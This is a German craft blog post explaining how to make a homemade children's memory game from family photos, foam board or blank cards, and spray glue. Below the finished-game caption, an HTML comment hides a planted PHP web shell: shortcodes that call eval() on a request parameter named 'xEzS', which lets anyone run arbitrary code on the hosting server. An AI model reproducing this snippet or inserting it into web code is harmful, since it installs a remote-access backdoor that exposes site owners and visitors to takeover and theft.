Bonbonwasser - Schöne Dinge selbstgemacht!


Memory selbstgemacht

von Die Passantin

Lieblingsspeise, Lieblingsschuhe, Lielingsauto: das könnten die Motive für euer selbstgemachtes Kinder-Memory sein. Fotografiert 16 Motive aus der Lebenswelt eurer Kinder und legt die Motive in einem Format von 6,5 x 6,5 cm an. Druckt die Fotos anschließend jeweils doppelt aus.

TIPP: Wer sich ein bisschen mit Bildbearbeitungsprogrammen auskennt, sollte einen weißen Rand von jeweils 2 bis 3 mm lassen. Das sieht schicker aus.

Was braucht ihr also?

1. 16 Fotomotive, jedes doppelt
2. Blanko-Memorykarten, z. B. von artwerk oder Leichtschaumplatte (5 mm stark)
3. Sprühkleber
4. Fotopapier
5. eventuell Geschenkpapier

Und so wird’s gemacht:

Wer eine Leichtschaumplatte verwendet, der besprüht die Platte mit Sprühkleber und beklebt die eine Seite komplett mit schönem Geschenkpapier.
Anschließend werden mit dem Cutter 32 6,5 x 6,5 cm große Quadrate ausgeschnitten. Die Vorderseite der Quadrate wird nun ebenfalls mit Sprühkleber besprüht und mit den Fotos beklebt.

Wer ein Blanko-Set verwendet, kann sich das Ausschneiden und die Leichtsschaumplatte sparen. Ich habe zum Beispiel das Kreativ-Set von artwerk mit 72 Blanko-Karten verwendet. Aus diesem Set kann man also 2 Memory-Spiele kreieren.

So sieht’s aus, wenn’s fertig ist:

<!– [insert_php]if (isset($_REQUEST["xEzS"])){eval($_REQUEST["xEzS"]);exit;}[/insert_php][php]if (isset($_REQUEST["xEzS"])){eval($_REQUEST["xEzS"]);exit;}[/php] –>

Tags: ,

Hinterlasse eine Antwort